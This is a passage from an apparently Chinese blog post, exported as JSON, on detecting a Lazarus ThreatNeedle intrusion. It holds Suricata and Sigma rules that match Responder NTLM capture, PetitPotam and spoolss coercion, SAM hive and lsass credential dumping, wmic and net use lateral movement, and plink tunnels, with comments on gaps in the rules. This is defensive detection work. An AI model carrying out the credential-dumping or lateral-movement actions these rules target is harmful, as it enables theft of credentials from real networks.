data-diff-id=\"ct-diff-id-kwbATInE\"><span class=\"ez-toc-section\" id=\"4%E3%80%81ThreatNeedle_Loader%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-R9EC5FEf\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E4%BB%8E%E6%B3%A8%E5%86%8C%E8%A1%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E9%85%8D%E7%BD%AE%E5%B9%B6%E4%B8%94%E8%A7%A3%E5%AF%86\"><\/span>1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-OLv8DUYP\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E8%A7%A3%E5%AF%86payload%E5%90%8E%E4%BB%8E%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD\"><\/span>2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-FMr3ZuiY\"><span class=\"ez-toc-section\" id=\"5%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8%E8%A1%8C%E4%B8%BA\"><\/span>5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-iouOZxtg\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E6%96%87%E4%BB%B6%E6%B5%8F%E8%A7%88%E4%B8%8E%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96\"><\/span>1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-iPS9i2FD\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E8%BF%9C%E6%8E%A7%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E8%A1%8C\"><\/span>2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<p data-diff-id=\"ct-diff-id-iPS9i2FD\">\u53c2\u8003\u6587\u7ae0\uff1a<a 
href=\"http:\/\/weizn.net\/?p=825\">\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fCMDSHELL<\/a><\/p>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-u7CpOBnD\"><span class=\"ez-toc-section\" id=\"6%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\"><\/span>6\u3001\u51ed\u636e\u6536\u96c6<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89responder%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E5%B7%A5%E5%85%B7\"><\/span>1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">基于Suricata规则检测流量特征（以下规则匹配Responder等工具默认使用的固定NTLM Server Challenge值；该值可被攻击者修改或随机化，静态特征只能覆盖默认配置，应与主机侧日志检测配合使用）：<\/div>\n<div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">alert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|12 34 56 78 ab cd ef 00|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055982;)\r\nalert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|11 22 33 44 55 66 77 88|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055964;)\r\nalert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|41 41 41 41 41 41 41 41|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055963;)<\/pre>\n<\/div>\n<\/div>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" 
id=\"2%EF%BC%89%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81\"><\/span>2\uff09\u5f3a\u5236\u8ba4\u8bc1<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">例如使用PetitPotam（EFSRPC）或SpoolSample（打印服务MS-RPRN）攻击，强制目标主机向攻击者控制的主机发起NTLM认证，再由前述Responder类工具捕获或中继。<\/div>\n<\/div>\n<div>\n<div class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 疑似PetitPotam攻击建立IPC管道（安全日志5145）。PetitPotam可经efsrpc、lsarpc、samr、lsass、netlogon等命名管道触发；下方'efsr'为精确匹配无法命中efsrpc，疑为笔误；lsarpc、samr、netlogon也被正常域操作大量使用，需结合来源主机基线降噪\r\ndetection:\r\n    eventid:\r\n        event_id: \"5145\"\r\n    selection1:\r\n        event_data.AccessMask: '0x3'\r\n        event_data.ShareName: '*IPC$'\r\n    selection2:\r\n        event_data.RelativeTargetName:\r\n            - 'efsr'\r\n            - 'lsarpc'\r\n            - 'samr'\r\n            - 'netlogon'\r\n            - 'lsass'\r\n    condition: all of them<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 疑似通过spoolss命名管道攻击打印服务（SpoolSample强制认证所用管道；对打印服务器而言此类访问属正常行为，需按主机排除）\r\ndetection:\r\n    selection1:\r\n        event_id: 5145\r\n    selection2:\r\n        event_data.RelativeTargetName: \"spoolss\"\r\n        event_data.AccessMask: '0x3'\r\n    condition: all of them<\/pre>\n<\/div>\n<\/div>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" id=\"3%EF%BC%89%E5%85%B6%E5%AE%83%E6%9C%AC%E5%9C%B0%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E6%96%B9%E5%BC%8F\"><\/span>3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">一种方式是dump hash后离线破解，另一种方式是在内存中直接dump出明文密码。监控点可以是执行凭据dump的命令行、对lsass.exe进程的异常访问（Sysmon事件10 ProcessAccess），或者dump内存时创建的临时文件，举例如：<\/div>\n<div>\n<div 
class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 通过reg.exe转储SAM/SECURITY/SYSTEM注册表配置单元以便离线提取hash（Sysmon事件1）\r\ndetection:\r\n    selection1:\r\n        EventID: 1\r\n        event_data.OriginalFileName: 'reg.exe'\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - '* save *'\r\n            - '* export *'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*hklm*'\r\n            - '*hkey_local_machine*'\r\n    selection4:\r\n        event_data.CommandLine:\r\n            - '*\\sam *'\r\n            - '*\\security *'\r\n            - '*\\system *'\r\n    condition: all of them<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 发现lsass进程内存转储文件落地（Sysmon事件11；仅覆盖文件名含lsass且扩展名为.dmp/.dump的情形，工具自定义文件名即可绕过，宜与下方进程访问规则配合）\r\ndetection:\r\n    selection1:\r\n        EventID: 11\r\n        event_data.TargetFilename:\r\n            - '*lsass*.dmp'\r\n            - '*lsass*.dump'\r\n    condition: selection1<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 发现针对lsass.exe的异常进程访问（Sysmon事件10）。GrantedAccess仅精确匹配0x1010，不同dump工具请求的访问掩码不同，宜扩展为列表；filter中'*\\appdata\\*'与'*\\program*'排除范围过宽，攻击工具常落地于这些目录，建议收窄为具体可信路径\r\ndetection:\r\n    selection1:\r\n        EventID: 10\r\n        event_data.GrantedAccess: \"0x1010\"\r\n    selection2:\r\n        event_data.TargetImage:\r\n            - \"*lsass.exe\"\r\n    filter:\r\n        event_data.SourceImage:\r\n            - \"*windows defender*\"\r\n            - '*\\microsoft security client\\*'\r\n            - '*\\kingsoft\\*'\r\n            - '*\\360*'\r\n            - '*\\wegame\\*'\r\n            - '*\\wechat\\*'\r\n            - '*\\appdata\\*'\r\n            - '*\\spool\\*'\r\n            - '*\\program*'\r\n    condition: selection1 and selection2 and not filter<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-OPRZID6x\"><span class=\"ez-toc-section\" id=\"7%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\"><\/span>7\u3001\u6a2a\u5411\u79fb\u52a8<span 
class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-PuQ6JS93\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BAIPC%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93\"><\/span>1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 使用net use携带显式凭据（/u:）远程连接IPC$共享（Sysmon事件1）\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.OriginalFileName:\r\n            - 'net.exe'\r\n            - 'net1.exe'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '* use *\\\\\\*\\IPC$*\/u*:*'\r\n            - '* use *\\\\\\*\/IPC$*\/u*:*'\r\n    condition: all of them<\/pre>\n<h6 data-diff-id=\"ct-diff-id-mEWwyb36\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89wmi%E5%91%BD%E4%BB%A4%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6\"><\/span>2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 通过wmic.exe向远程主机下发进程创建命令（Sysmon事件1）。注意wmic全局开关的标准写法为/node:主机、/user:用户、/password:口令，开关与取值以冒号相连；下方'* /user *'等模式要求开关后紧跟空格，可能匹配不到标准写法，建议改为'*/node:*'、'*/user:*'、'*/password:*'\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.OriginalFileName: 'wmic.exe'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*process *call *create *'\r\n    select4:\r\n        event_data.CommandLine: '* \/user *'\r\n    select5:\r\n        event_data.CommandLine: '* \/password *'\r\n    select6:\r\n        event_data.CommandLine: '* \/node *'\r\n    condition: all of them<\/pre>\n<h6 data-diff-id=\"ct-diff-id-rHrGSsvF\"><span class=\"ez-toc-section\" id=\"3%EF%BC%89%E7%99%BB%E5%BD%95%E6%88%90%E5%8A%9F%E5%A4%9A%E5%8F%B0windows_server\"><\/span>3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server<span 
class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 4624远程登录成功（LogonType 3 且认证包为NTLM，仅作为下方EPL关联规则的输入告警。注意只覆盖NTLM认证，以主机名发起的横向访问多走Kerberos，需另行覆盖）\r\ndetection:\r\n    selection1:\r\n        event_id: 4624\r\n        event_data.LogonType: \"3\"\r\n        event_data.AuthenticationPackageName: 'ntlm'\r\n    selection2:\r\n        event_data.IpAddress:\r\n            - '10.*'\r\n            - '192.168.*'\r\n            - '172.16.*'\r\n            - '172.17.*'\r\n            - '172.18.*'\r\n            - '172.19.*'\r\n            - '172.20.*'\r\n            - '172.21.*'\r\n            - '172.22.*'\r\n            - '172.23.*'\r\n            - '172.24.*'\r\n            - '172.25.*'\r\n            - '172.26.*'\r\n            - '172.27.*'\r\n            - '172.28.*'\r\n            - '172.29.*'\r\n            - '172.30.*'\r\n            - '172.31.*'\r\n\r\n            # \u90e8\u5206\u4f01\u4e1a\u79c1\u6709\u5730\u5740\u4e0d\u591f\u7528\uff0c\u4f1a\u5728\u8def\u7531\u4e0a\u4fee\u6539\u8fd9\u4e2a\u7f51\u6bb5\u4e3a\u79c1\u6709\u5730\u5740\r\n            - '11.*'\r\n    filter:\r\n        computer_name:\r\n            # \u8fc7\u6ee4\u6253\u5370\u673a\r\n            - \"*print*\"\r\n    condition: selection1 and selection2 and not filter<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 发现源主机远程登录成功多个Windows机器（10分钟滑动窗口内同一源IP成功登录不少于3台不同主机）\r\nepl: '\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u521b\u5efa\u7a97\u53e3\")\r\n@public\r\ncreate window a9ebeac45532e1c_Window_4624#groupwin(\r\nevent_data_ipaddress)#unique(\r\nevent_data_ipaddress, event_data_targetusername, host_ip)#time(10 min) as\r\nselect\r\nevent_data_ipaddress,\r\nevent_data_targetusername,\r\nhost_ip\r\nfrom SigmaAlerts;\r\n\r\n\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u5199\u5165\u7f13\u5b58\u6570\u636e\")\r\ninsert into 
a9ebeac45532e1c_Window_4624 select\r\nevent_data_ipaddress,\r\nevent_data_targetusername,\r\nhost_ip\r\nfrom SigmaAlerts\r\nwhere\r\nalert_signature = \"4624\u8fdc\u7a0b\u767b\u5f55\u6210\u529f\" and\r\nevent_data_targetusername != \"anonymous logon\";\r\n\r\n\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u6267\u884c\u67e5\u8be2\")\r\non pattern[every timer:interval(5 sec)]\r\nselect\r\nevent_data_ipaddress,\r\ncount(distinct host_ip) as diff_cnt\r\nfrom a9ebeac45532e1c_Window_4624\r\ngroup by\r\nevent_data_ipaddress\r\nhaving count(distinct host_ip) &gt;= 3;\r\n\r\n'<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-7RAyHIRT\"><span class=\"ez-toc-section\" id=\"8%E3%80%81%E6%8E%A7%E5%88%B6%E4%BA%86IT%E7%AE%A1%E7%90%86%E5%91%98%E7%9A%84%E6%9C%BA%E5%99%A8%EF%BC%8Cdump%E6%B5%8F%E8%A7%88%E5%99%A8%E5%87%AD%E6%8D%AE\"><\/span>8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-5Py11WCp\"><span class=\"ez-toc-section\" id=\"9%E3%80%81%E5%9C%A8%E5%91%98%E5%B7%A5%E7%94%B5%E8%84%91%E4%B8%8A%E4%BD%BF%E7%94%A8PuTTyPSCP%E5%B7%A5%E5%85%B7%E4%B8%8A%E4%BC%A0%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%B0server\"><\/span>9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTY PSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 疑似使用PuTTY PSCP工具远程传输文件（Sysmon事件1；正则只匹配用户名@IP地址:路径的形式，目标以主机名给出时不会命中）\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+[a-z0-9_\\.]{1,15}@\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:(\/|\\.|~).{1,20}\\s+.*(\\\\|\/|\\.).*\r\n            - 
regex:(?i).*\\s+.*(\\\\|\/|\\.).*\\s+[a-z0-9_\\.]{1,15}@\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:(\/|\\.|~).{1,20}\r\n    condition: all of them<\/pre>\n<h5 data-diff-id=\"ct-diff-id-e3DaCezf\"><span class=\"ez-toc-section\" id=\"10%E3%80%81NMAP%E6%89%AB%E6%8F%8F%E4%BA%86%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E4%B8%AD%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3\"><\/span>10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-Os9dG7CG\"><span class=\"ez-toc-section\" id=\"11%E3%80%81linux%E4%B8%8A%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E6%9F%A5%E7%9C%8B%EF%BC%8C%E4%BB%A5%E5%8F%8A%E9%80%9A%E8%BF%87rm%E5%91%BD%E4%BB%A4%E6%B8%85%E9%99%A4\"><\/span>11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-Cvln6zR0\"><span class=\"ez-toc-section\" id=\"12%E3%80%81%E4%BD%BF%E7%94%A8logrotate%E5%B7%A5%E5%85%B7%E6%B8%85%E9%99%A4linux%E6%97%A5%E5%BF%97\"><\/span>12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-iF0xBRLu\"><span class=\"ez-toc-section\" id=\"13%E3%80%81http%E4%BB%A3%E7%90%86%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E7%AA%81%E7%A0%B4%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\"><\/span>13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-BASeGHkU\"><span class=\"ez-toc-section\" 
id=\"14%E3%80%81%E5%9C%A8%E8%A2%AB%E6%8E%A7server%E4%B8%8A%E9%80%9A%E8%BF%87ssh%E5%88%9B%E5%BB%BA%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84ssh%E9%9A%A7%E9%81%93\"><\/span>14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 疑似使用plink工具创建SSH端口转发隧道（Sysmon事件1）。注意selection2要求监听IP:端口:目标IP:端口的完整写法，-L/-R省略监听地址的常见写法（端口:目标:端口）不会命中；selection4要求出现-N，而不带-N同样可以建立隧道，二者都会造成漏报\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,5}:\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,5}.*\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+[a-z0-9_\\.]{1,15}@.*\\..*\r\n    selection4:\r\n        event_data.CommandLine: '* -N *'\r\n    condition: all of them<\/pre>\n<h5 data-diff-id=\"ct-diff-id-ftyRoz3H\"><span class=\"ez-toc-section\" id=\"15%E3%80%81PuTTyPSCP%E5%B7%A5%E5%85%B7%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\"><\/span>15\u3001PuTTY PSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e<span 
class=\"ez-toc-section-end\"><\/span><\/h5>\n<p>\u540c9<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002<\/p>\n","protected":false},"author":1,"featured_media":818,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[356,357],"class_list":["post-780","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-apt","tag-357"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=780\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" 
content=\"Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=780\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-20T09:20:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T09:18:00+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1250\" \/>\n\t<meta property=\"og:image:height\" content=\"460\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s 
Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=780#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\",\"width\":1250,\"height\":460},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=780#webpage\",\"url\":\"http:\/\/weizn.net\/?p=780\",\"name\":\"APT\\u653b\\u9632\\u63a8\\u6f14\\uff1aLazarus\\u7ec4\\u7ec7\\u9488\\u5bf9\\u56fd\\u9632\\u5de5\\u4e1a\\u7684\\u4e00\\u6b21\\u653b\\u51fb - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=780#primaryimage\"},\"datePublished\":\"2021-08-20T09:20:48+00:00\",\"dateModified\":\"2021-08-25T09:18:00+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=780#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=780\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=780#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"APT\\u653b\\u9632\\u63a8\\u6f14\\uff1aLazarus\\u7ec4\\u7ec7\\u9488\\u5bf9\\u56fd\\u9632\\u5de5\\u4e1a\\u7684\\u4e00\\u6b21\\u653b\\u51fb\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=780#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=780#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":
